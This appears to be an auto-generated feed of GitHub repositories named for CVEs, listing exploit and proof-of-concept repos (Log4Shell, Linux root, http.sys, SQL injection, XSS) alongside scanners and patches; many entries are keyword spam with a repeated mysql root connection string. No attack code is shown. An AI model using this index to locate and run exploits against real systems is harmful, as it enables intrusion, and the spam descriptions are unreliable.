**cve update exploit poc rce sqli code cve-2022-3026 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3026](https://github.com/git-cve-updater/cve-2022-3026) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3032 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3032](https://github.com/git-cve-updater/cve-2022-3032) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3018 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3018](https://github.com/git-cve-updater/cve-2022-3018) create time: 2022-01-21T07:04:38Z

**cve update exploit poc rce sqli code cve-2022-3022 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3022](https://github.com/git-cve-updater/cve-2022-3022) create time: 2022-01-21T07:04:38Z

**cve update exploit poc rce sqli code cve-2022-3020 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3020](https://github.com/git-cve-updater/cve-2022-3020) create time: 2022-01-21T07:04:38Z

**cve update exploit poc rce sqli code cve-2022-3004 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3004](https://github.com/git-cve-updater/cve-2022-3004) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3006 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3006](https://github.com/git-cve-updater/cve-2022-3006) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3012 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3012](https://github.com/git-cve-updater/cve-2022-3012) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3000 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3000](https://github.com/git-cve-updater/cve-2022-3000) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3014 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3014](https://github.com/git-cve-updater/cve-2022-3014) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3016 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3016](https://github.com/git-cve-updater/cve-2022-3016) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3010 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3010](https://github.com/git-cve-updater/cve-2022-3010) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3002 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3002](https://github.com/git-cve-updater/cve-2022-3002) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-3008 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3008](https://github.com/git-cve-updater/cve-2022-3008) create time: 2022-01-21T07:04:36Z

**cve update exploit poc rce sqli code cve-2022-1160 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-1160](https://github.com/git-cve-updater/cve-2022-1160) create time: 2022-01-21T06:41:17Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-20019](https://github.com/AlphabugX/CVE-2022-20019) create time: 2022-01-21T05:45:10Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-20020](https://github.com/AlphabugX/CVE-2022-20020) create time: 2022-01-21T05:45:10Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-20023](https://github.com/AlphabugX/CVE-2022-20023) create time: 2022-01-21T05:45:10Z

**POC for cve-2022-21658** : [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658) create time: 2022-01-21T06:09:16Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23112](https://github.com/AlphabugX/CVE-2022-23112) create time: 2022-01-21T05:47:41Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23094](https://github.com/AlphabugX/CVE-2022-23094) create time: 2022-01-21T05:47:39Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23120](https://github.com/AlphabugX/CVE-2022-23120) create time: 2022-01-21T05:47:38Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-20618](https://github.com/AlphabugX/CVE-2022-20618) create time: 2022-01-21T05:47:38Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23083](https://github.com/AlphabugX/CVE-2022-23083) create time: 2022-01-21T05:47:38Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23314](https://github.com/AlphabugX/CVE-2022-23314) create time: 2022-01-21T05:47:38Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23408](https://github.com/AlphabugX/CVE-2022-23408) create time: 2022-01-21T05:47:37Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23435](https://github.com/AlphabugX/CVE-2022-23435) create time: 2022-01-21T05:47:37Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23132](https://github.com/AlphabugX/CVE-2022-23132) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23307](https://github.com/AlphabugX/CVE-2022-23307) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23221](https://github.com/AlphabugX/CVE-2022-23221) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23219](https://github.com/AlphabugX/CVE-2022-23219) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23315](https://github.com/AlphabugX/CVE-2022-23315) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23302](https://github.com/AlphabugX/CVE-2022-23302) create time: 2022-01-21T05:47:36Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23109](https://github.com/AlphabugX/CVE-2022-23109) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23117](https://github.com/AlphabugX/CVE-2022-23117) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-22893](https://github.com/AlphabugX/CVE-2022-22893) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23218](https://github.com/AlphabugX/CVE-2022-23218) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23222](https://github.com/AlphabugX/CVE-2022-23222) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-22891](https://github.com/AlphabugX/CVE-2022-22891) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23304](https://github.com/AlphabugX/CVE-2022-23304) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23107](https://github.com/AlphabugX/CVE-2022-23107) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23303](https://github.com/AlphabugX/CVE-2022-23303) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23305](https://github.com/AlphabugX/CVE-2022-23305) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23227](https://github.com/AlphabugX/CVE-2022-23227) create time: 2022-01-21T05:47:35Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23133](https://github.com/AlphabugX/CVE-2022-23133) create time: 2022-01-21T05:47:34Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23114](https://github.com/AlphabugX/CVE-2022-23114) create time: 2022-01-21T05:47:34Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23134](https://github.com/AlphabugX/CVE-2022-23134) create time: 2022-01-21T05:47:34Z

**![image](https://user-images.githubusercontent.com/27001865/150348452-38595c7d-8f16-4564-a1c7-9a02ed9b57a9.png)\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload** : [AlphabugX/CVE-2022-23178](https://github.com/AlphabugX/CVE-2022-23178) create time: 2022-01-21T05:47:34Z

**test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC** : [AlphabugX/CVE-2022-23305](https://github.com/AlphabugX/CVE-2022-23305) create time: 2022-01-21T05:07:59Z

**CVE-2021-32099 SQLi allow attacker bypass login** : [l3eol3eo/CVE-2021-32099_SQLi](https://github.com/l3eol3eo/CVE-2021-32099_SQLi) create time: 2022-01-21T02:43:20Z

**no description** : [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219) create time: 2022-01-20T14:24:45Z

**// SPDX-FileCopyrightText: Portions Copyright 2021 Siemens // Modified on 15-Jul-2021 by Siemens and/or its affiliates to fix CVE-2018-1311: Apache Xerces-C use-after-free vulnerability scanning external DTD. Copyright 2021 Siemens.** : [johnjamesmccann/xerces-3.2.3-DTD-hotfix](https://github.com/johnjamesmccann/xerces-3.2.3-DTD-hotfix) create time: 2022-01-20T13:43:38Z

**no description** : [LazyTitan33/CVE-2021-32790-PoC](https://github.com/LazyTitan33/CVE-2021-32790-PoC) create time: 2022-01-20T11:38:09Z

**no description** : [semelnyk/CVE-2021-44228-ScannersListFromRF](https://github.com/semelnyk/CVE-2021-44228-ScannersListFromRF) create time: 2022-01-20T10:34:48Z

**Testing WAF protection against CVE-2021-44228** : [robrankin/cve-2021-44228-waf-tests](https://github.com/robrankin/cve-2021-44228-waf-tests) create time: 2022-01-20T09:30:44Z

**Patch your code for October CMS Auth Bypass CVE-2021-32648** : [daftspunk/CVE-2021-32648](https://github.com/daftspunk/CVE-2021-32648) create time: 2022-01-20T09:28:13Z

**It is a nmap script for GravCMS vulnerability (CVE-2021-21425)** : [frknktlca/GravCMS_Nmap_Script](https://github.com/frknktlca/GravCMS_Nmap_Script) create time: 2022-01-19T17:54:19Z

**It is a nmap script for metabase vulnerability (CVE-2021-41277)** : [frknktlca/Metabase_Nmap_Script](https://github.com/frknktlca/Metabase_Nmap_Script) create time: 2022-01-19T17:43:38Z

**💀 Linux local root exploit CVE-2018-18955** : [scheatkode/CVE-2018-18955](https://github.com/scheatkode/CVE-2018-18955) create time: 2022-01-19T14:47:47Z

**Exploit for CVE-2021-25741 vulnerability** : [Betep0k/CVE-2021-25741](https://github.com/Betep0k/CVE-2021-25741) create time: 2022-01-19T14:05:20Z

**CVE-2022-0185** : [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185) create time: 2022-01-19T06:19:38Z

**no description** : [aymenbouferroum/CVE-2021-43798_exploit](https://github.com/aymenbouferroum/CVE-2021-43798_exploit) create time: 2022-01-18T21:04:39Z

**Finds an identifiable hash value for each version of GitLab vulnerable to CVE-2021-22205 (https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json) for use in fingerprinting.** : [GitLab-Red-Team/cve-2021-22205-hash-harvester](https://github.com/GitLab-Red-Team/cve-2021-22205-hash-harvester) create time: 2022-01-18T20:40:55Z

**Exploit for CVE-2021-32099** : [nikn0laty/CVE-2021-32099_exploit](https://github.com/nikn0laty/CVE-2021-32099_exploit) create time: 2022-01-18T19:29:55Z

**POC for Infamous Log4j CVE-2021-44228** : [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC) create time: 2022-01-18T19:22:38Z

**cf8-upload.py | CVE-2009-2265** : [0zvxr/CVE-2009-2265](https://github.com/0zvxr/CVE-2009-2265) create time: 2022-01-14T17:34:28Z

**Apache log4j2 CVE-20210-44228 poc** : [c4dr01d/CVE-2021-44228-poc](https://github.com/c4dr01d/CVE-2021-44228-poc) create time: 2021-12-23T03:18:26Z

**no description** : [x41sec/CVE-2021-34600](https://github.com/x41sec/CVE-2021-34600) create time: 2022-01-17T16:08:17Z

**Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers** : [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys) create time: 2022-01-17T15:42:37Z

**no description** : [fimtow/CVE-2021-24750](https://github.com/fimtow/CVE-2021-24750) create time: 2022-01-14T21:19:43Z

**本项目并不刻意搜集 POC 或 EXP,主要以CVE-2022为关键词,包含但不限于漏洞资讯、漏洞复现、漏洞分析、漏洞验证、漏洞利用** : [binganao/vulns-2022](https://github.com/binganao/vulns-2022) create time: 2022-01-15T00:31:06Z

**Terraform and Docker resources for quickly spinning up a test of CVE-2021-4428** : [z3bul0n/log4jtest](https://github.com/z3bul0n/log4jtest) create time: 2022-01-18T00:09:11Z

**WordPress Core 5.8.2 - 'WP_Query' SQL Injection** : [TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection](https://github.com/TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection) create time: 2022-01-18T01:05:04Z

**Apache Dubbo Hessian2 CVE-2021-43297 demo** : [longofo/Apache-Dubbo-Hessian2-CVE-2021-43297](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297) create time: 2022-01-17T17:52:34Z

**A simple script to check for ProxyShell** : [jrgdiaz/ProxyShell-CVE-2021-34473](https://github.com/jrgdiaz/ProxyShell-CVE-2021-34473) create time: 2022-01-17T15:12:58Z

**CVE-2022-21907** : [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907) create time: 2022-01-17T13:42:44Z

**Static detection of vulnerable log4j librairies on Windows members of an AD domain.** : [arnaudluti/PS-CVE-2020-44228](https://github.com/arnaudluti/PS-CVE-2020-44228) create time: 2022-01-17T12:46:20Z

**CVE-2022-21907** : [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907) create time: 2022-01-17T13:18:08Z

**CVE-2022-0236** : [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236) create time: 2022-01-17T12:56:19Z

**CVE-2021-43297 POC** : [bitterzzZZ/CVE-2021-43297-POC](https://github.com/bitterzzZZ/CVE-2021-43297-POC) create time: 2022-01-17T12:26:18Z

**no description** : [KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability](https://github.com/KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability) create time: 2022-01-17T08:45:28Z

**no description** : [nazgul6092/2nd-Year-Project-01-Linux-Exploitation-using-CVE-20166-5195](https://github.com/nazgul6092/2nd-Year-Project-01-Linux-Exploitation-using-CVE-20166-5195) create time: 2022-01-15T13:30:15Z

**no description** : [artsking/linux-4.19.72_CVE-2020-14386_extrapatch](https://github.com/artsking/linux-4.19.72_CVE-2020-14386_extrapatch) create time: 2022-01-17T03:55:23Z

**测试各位cve检测的灵敏性** : [Fanc1er/CVE-2022-21918](https://github.com/Fanc1er/CVE-2022-21918) create time: 2022-01-17T03:20:44Z

**Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907** : [antx-code/CVE-2022-21907](https://github.com/antx-code/CVE-2022-21907) create time: 2022-01-17T02:28:50Z

**no description** : [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236) create time: 2022-01-16T09:52:28Z

**This repo contains dumped flash partitions with firmware version vulnerable to CVE-2019-17147, and some useful binaries to downgrade and debug your WR841N router.** : [DrmnSamoLiu/CVE-2019-17147_Practice_Material](https://github.com/DrmnSamoLiu/CVE-2019-17147_Practice_Material) create time: 2022-01-16T07:08:57Z

**An exploit/PoC for CVE-2021-42237** : [PinkDev1/CVE-2021-42237](https://github.com/PinkDev1/CVE-2021-42237) create time: 2022-01-16T05:22:30Z

**CVE-2021-28476: Hyper-V vmswitch.sys arbitrary pointer dereference from guest VM** : [australeo/CVE-2021-28476](https://github.com/australeo/CVE-2021-28476) create time: 2022-01-16T02:45:26Z

**This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired.** : [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907) create time: 2022-01-15T20:50:25Z

**CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.** : [plsanu/CVE-2021-46080](https://github.com/plsanu/CVE-2021-46080) create time: 2022-01-14T21:45:58Z

**CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.** : [plsanu/CVE-2021-46079](https://github.com/plsanu/CVE-2021-46079) create time: 2022-01-14T21:26:02Z

**CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.** : [plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS) create time: 2021-12-28T18:23:42Z

**CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.** : [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection) create time: 2021-12-28T18:17:36Z

**CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.** : [plsanu/CVE-2021-46078](https://github.com/plsanu/CVE-2021-46078) create time: 2022-01-14T20:49:42Z

**CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.** : [plsanu/CVE-2021-46076](https://github.com/plsanu/CVE-2021-46076) create time: 2022-01-14T20:28:01Z

**CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.** : [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting) create time: 2021-12-28T15:35:20Z

**CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.** : [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution) create time: 2021-12-28T15:00:17Z

**CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.** : [plsanu/CVE-2021-46075](https://github.com/plsanu/CVE-2021-46075) create time: 2022-01-14T20:15:28Z

**CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.** : [plsanu/CVE-2021-46074](https://github.com/plsanu/CVE-2021-46074) create time: 2022-01-14T20:01:50Z

**CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.** : [plsanu/CVE-2021-46073](https://github.com/plsanu/CVE-2021-46073) create time: 2022-01-14T19:49:07Z

**CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.** : [plsanu/CVE-2021-46072](https://github.com/plsanu/CVE-2021-46072) create time: 2022-01-14T19:34:50Z

**CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.** : [plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations) create time: 2021-12-28T14:46:13Z

**CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.** : [plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T14:37:00Z

**CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.** : [plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T14:29:44Z

**CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.** : [plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T14:22:43Z

**CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.** : [plsanu/CVE-2021-46071](https://github.com/plsanu/CVE-2021-46071) create time: 2022-01-14T19:09:36Z

**CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.** : [plsanu/CVE-2021-46070](https://github.com/plsanu/CVE-2021-46070) create time: 2022-01-14T18:54:29Z

